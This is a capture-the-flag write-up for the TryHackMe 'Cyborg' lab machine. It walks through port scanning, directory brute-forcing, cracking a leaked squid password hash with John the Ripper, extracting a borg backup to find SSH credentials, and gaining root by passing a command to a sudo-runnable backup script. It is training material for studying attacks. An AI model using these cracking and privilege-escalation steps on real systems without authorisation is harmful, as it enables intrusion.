TryHackMe - Cyborg

A box involving encrypted archives, source code analysis and more.

Let's do Cyborg on TryHackMe

Open Ports

$ nmap -sV -sC --open -Pn $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-09 01:57 EDT
Nmap scan report for 10.10.238.68
Host is up (0.18s latency).
Not shown: 704 closed tcp ports (conn-refused), 294 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                     |
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)       |
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)      |
| _  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519) |
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works                                           
|_http-server-header: Apache/2.4.18 (Ubuntu)   
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web

Discover any easy information on the web server with gobuster.

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://$IP

/admin

Poking around we see some chatter which gives away what else to look for:

Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier. I decided to give up like i always do ahahaha sorry about that. I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process. Might pass it over to the IT guys but in the meantime all the config files are laying about. And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol. other than that im pretty sure my backup "music_archive" is safe just to confirm.

Download the music archive, archive.tar

/etc/squid/{passwd, squid.conf}

Download the passwd file, crack it with john the ripper

$ john -wordlist:/usr/share/wordlists/rockyou.txt ./passwd      
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********        (music_archive)     
1g 0:00:00:00 DONE (2022-10-09 02:04) 2.000g/s 77952p/s 77952c/s 77952C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Use the cracked password and borg to extract the downloaded archive

$ cat Documents/note.txt 
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
	
****:**********

Initial Access - SSH

Now we can SSH to the server as alex with the found password.

alex@ubuntu:~$ cat user.txt
flag{*********************************}

Privilege Escalation

alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
	env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
        
User alex may run the following commands on ubuntu:
	(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

The backup script can be executed via sudo, and looking at it, we see it has the option to run some command:

while getopts c: flag
do
    case "${flag}" in 
        c) command=${OPTARG};;
    esac
done 

This means we can specify an additional argument, which will be executed towards the end of the script, and since we're going to execute the script with sudo, it will execute that command as root.

$ sudo /etc/mp3backups/backup.sh -c "cat /root/root.txt"

flag{***********************************}